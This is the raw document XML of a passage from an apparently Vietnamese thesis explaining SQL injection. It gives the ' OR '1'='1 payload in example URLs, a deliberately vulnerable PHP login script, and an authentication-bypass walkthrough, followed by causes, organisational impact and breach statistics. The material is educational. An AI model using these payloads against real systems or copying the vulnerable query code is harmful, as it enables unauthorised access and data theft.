          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> thêm câu lệnh SQL bằng cách thêm vào tham số val đoạn mã: ‘OR ‘1’=‘1. URL sẽ thành:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://www.victim.com/products.php?val=100’ OR ‘1’=‘1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mã PHP sẽ thực thi và trả về tất cả các sản phầm, không liên quan đến giá của nó. Bở</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>i vì trong ví dụ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã thay đổi logic của câu truy vấn SQL, khi nối thêm toán hạng OR, điều đó làm cho câu truy vấn luôn trả về True (vì thật sự 1 luôn bằng 1). Câu lệnh sau sẽ được sinh ra thực thi:</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xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00876FFE">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w: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FROM ProductsTbl</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WHERE Price &lt; ‘100.00’ OR ‘1’ = ‘1’</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ORDER BY ProductDescription;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Có rất nhiều cách để khai thác lỗ hổng SQL injection để đạt được vô số các mục tiêu. Sự thành công của các cuộc tấn công thường là phụ thuộc nhiều vào cơ sở dữ liệu và kết nối các hệ thống cơ bản mà đang bị tấn công. Đôi khi </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nó có thể mất rất nhiều kỹ năng và sự kiên trì để khai thác một lỗ hổng tiềm năng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Trong ví dụ trên, </w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>luận văn đã trình bày</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> cách kẻ tấn công tạo ra câu lệnh câu lệnh truy vấn SQL động từ đầu vào không được kiểm tra, từ đó thực thi các hành vi phía </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> không lường trước được.Trong ví dụ sau, một CMS (Content Management System) là một ứng dụng web được sử dụng để tạo, chỉnh sửa, quản lý và xuất bản nội dung cho một trang web mà không cần có một sự hiểu biết sâu hoặc khả năng mã trong HTML. Sử dụng các URL sau đây để truy cập các ứng dụng CMS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00357C7D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.victim.com/cms/login.php?username=foo&amp;password=bar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ứng dụng CMS yêu cầu cung cấp một tên người dùng và mật khẩu hợp lệ trước khi có thể truy cập vào các chức năng của nó. Truy cập các URL trước sẽ cho kết quả trong các lỗi “Incorrect username or password, please try again.”. Dưới đây là các mã cho file login.php:</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connect to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$query = “SELECT userid FROM CMSUsers WHERE user = ‘$_GET[“user”]’ ”.</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“AND password = ‘$_GET[“password”]’”;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$result = mysql_query($query);</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check to see how many rows were returned from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$rowcount = mysql_num_rows($result);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if a row is returned then the credentials must be valid, so</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forward the user to the admin pages</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if ($rowcount ! = 0){header(“Location: admin.php”);}</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if a row is not returned then the credentials must be invalid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else {die(‘Incorrect username or password, please try again.’)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>File login.php tự động tạo ra một câu lệnh SQL sẽ trả về một bản ghi mà nếu một tên truy nhập và mật khẩu hợp lệ được nhập vào. Các truy vấn sẽ trả userid tương ứng cho người sử dụng nếu giá trị user và password phù hợp với một giá trị được lưu trữ tương ứng trong bảng CMSUsers:</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876FFE" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:t>SELECT userid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="00876FFE" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:lastRenderedPageBreak/>
              <w:t>FROM CMSUsers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00876FFE">
              <w:t>WHERE user = ‘foo’ AND password = ‘bar’;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Vấn đề là trong đoạn mã trên, lập trình viên (LTV) tin rằng số lượng bản ghi trả về chỉ có thể là 0 hoặc 1. Trong ví dụ trướ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> trình bày về việc</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> inject để kết quả trả về luôn là TRUE. Nếu tiếp tục sử dụng lạ</w:t>
      </w:r>
      <w:r w:rsidR="005E7228">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">i, kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể làm sai logic của phần xác thực. Bằng cách thêm ‘OR ‘1’=’1 vào sau URL, đoạn script PHP trong lần này sẽ trả về tất cả user trong bảng CMSUsers. URL trông như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>http://www.victim.com/cms/login.php?username=foo&amp;password=bar’ OR ‘1’=’1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tất cả các userids được trả về bởi vì logic của câu truy vấn</w:t>
      </w:r>
      <w:r w:rsidR="005E7228">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị </w:t>
      </w:r>
      <w:r w:rsidR="005E7228" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>đã thay đổi</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Dưới đây là các truy vấn đã được xây dựng và thực hiện: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userid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>FROM CMSUsers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>WHERE user = ‘foo’ AND password = ‘password’ OR ‘1’ = ‘1’;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Logic của ứng dụng có nghĩa là nếu CSDL trả về nhiều hơn 1 bản ghi, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã nhập thông tin đăng nhập chính xác và có quyền truy cập vào file admin,php được bảo vệ. Sử dụng kỹ thuật khai thác này, thông thường sẽ được đăng nhập như là user đầu tiên trong bảng CMSUsers. Bằng việc khai thác lỗ hổng SQL injection đã phá vỡ cơ chế xác thực của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc459374311"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nguyên nhân của lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL là ngôn ngữ chuẩn để truy cập vào các hệ quản trị CSDL: Microsoft SQL Server, Oracle, MySQL, Sybase, và Informix… Hầu hết các ứng dụng Web cần phải tương tác với một CSDL, và hầu hết các ngôn ngữ lập trình ứng dụng web, như ASP, C #, .NET, Java và PHP, cung cấp cách chương trình kết nối với một cơ sở dữ liệu và nó. Lỗ hổng SQL injection xảy ra khi các </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  ứng dụng Web không đảm bảo các giá trị nhận được từ người dùng (Web form, cookie, input parameter…) được kiểm tra chặt chẽ trước khi truyền vào câu truy vấn SQL và thực hiện trên máy chủ CSDL. Nếu một kẻ tấn công có thể kiểm soát đầu vào đó và thay đổi, những kẻ tấn công có thể thực thi câu lệnh SQL trên máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mỗi ngôn ngữ lập trình cung cấp một số cách khác nhau để xây dựng và thực thi câu lệnh SQL, và các </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thường sử dụng kết hợp của các phương pháp khác nhau. Có rất nhiều trang web cung cấp các hướng dẫn và các ví dụ để giúp các LTV giải quyết vấn đề thông thường, và thường các ví dụ này không an toàn. Nếu không có một sự hiểu biết về các hệ quản trị CSDL, nhận thức về các vấn đề bảo mật, LTV có thể làm ra một ứng dụng mắc lỗi SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dynamic string building là một kỹ thuật cho phép LTV tạo ra câu lệnh SQL trong khi chạy. Một câu lệnh SQL động được xây dựng ở thời gian thực hiện, đối với những điều kiện khác nhau tạo ra các câu lệnh SQL khác nhau. Nó có thể cho các LTV xây dựng ra các câu lệnh tự động, tùy thuộc vào hoàn cảnh, đầu vào từ người dùng. Các nguyên nhân dẫn đến việc tạo ra câu lệnh SQL không an toàn có thể là:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Không kiểm soát ký tự Escape.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Không kiểm soát loại dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Không kiểm soát quá trình sinh câu lệnh SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Không kiếm soát thông báo lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu không kiểm soát chặt quá trình sinh câu lệnh này, kẻ tấn công hoàn toàn có thể tạo ra câu lệnh SQL và thực thi trên máy chủ CSDL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc459374312"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ảnh hưởng của lỗ hổng SQL injection với tổ chức.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Khai thác lỗ hổng SQL injection, kẻ tấn công có thể chiếm quyền điều khiển toàn bộ CSDL. Kẻ tấn công có thể lấy toàn bộ các thông tin nhạy cảm: thông tin tài khoản, thông tin thẻ tín dụng. Một số có thể chỉnh sửa, tạo thêm các tài khoản quản trị mức ứng dụng để từ đó chiếm quyền điều khiển ứng dụng, thực thi trái phép các hành vi không được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Một hướng khác, kẻ tấn công thực hiện tấn công nâng quyền. Một số hệ quản trị CSDL cho phép thực thi câu lệnh hệ điều hành. Thông thường, các hệ quản trị CSDL này được chạy với quyền quản trị, do đó, có thể thực thi các câu lệnh hệ điều hành với quyền quản trị. Khai thác theo hướng này, kẻ tấn công hoàn toàn có thể chiếm quyền điều khiển hoàn toàn máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một số nguồn trên thế giới có thể cho thấy sự ảnh hưởng của lỗ hổng SQL injection. Năm 2011, CWE (Common Weakness Enumeration)/SANS Top 25 Most Dangerous Software Errors là một danh sách thống kê các lỗ hổng nghiêm </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>trọng nhất của phần mềm. Danh sách được tổng hợp từ hơn 20 nguồn khác nhau, sử dụng cơ chế Common Weakness Scoring System (CWSS) để chấm điểm. Vào năm 2011, lỗ hổng SQL injection đứng đầu danh sách (</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://cwe.mitre.org/top25/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài ra, Open Web Application Security Project (OWASP) cũng liệt kê lỗi nhúng mã (bao gồm SQL injection) là lỗ hổng bảo mật nghiêm trọng nhất trong top 10 lỗ hổng ứng dụng web năm 2010. Mục đích chính của OWASP Top 10 là để đào tạo LTV, quản lý, thiết kế phần mềm, và các tổ chức về những hậu quả của các lỗ hổng bảo mật ứng dụng web phổ biến nhất. Trong danh sách trước đó được phát hành năm 2007, lỗ hổng SQL injection đứng thứ hai. Tuy nhiên, vào năm 2010 khi thay đổi cách tính điểm dựa trên ảnh hưởng/nguy cơ rủi ro, lỗ hổng SQL injection đã lên đầu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Một nguồn khác, đó là thông tin các website bị tấn công được thống kê trên Zone-H. Một lượng lớn các trang web bị tấn công khai thác bằng lỗ hổng SQL injection. Giới truyền thông cũng có nhiều công bố về các vụ tấn công ảnh hưởng đến các công ty, tổ chức lớn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tháng 2/2002, Jeremiah Jacks (</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.securityfocus.com/news/346</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) phát hiện lỗ hổng SQL injection của Guess.com, thu được ít nhất thông tin thẻ tín dụng của 200,000 khách hàng.</w:t>
      </w:r>
    </w:p>
